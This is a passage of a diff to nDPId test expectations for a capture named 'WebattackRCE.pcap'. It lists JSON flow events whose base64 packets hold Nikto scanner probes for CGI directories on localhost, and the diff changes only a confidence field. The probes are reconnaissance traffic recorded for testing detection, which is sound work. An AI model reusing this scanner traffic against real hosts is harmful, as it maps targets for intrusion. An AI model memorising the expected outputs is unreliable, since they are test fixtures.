00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 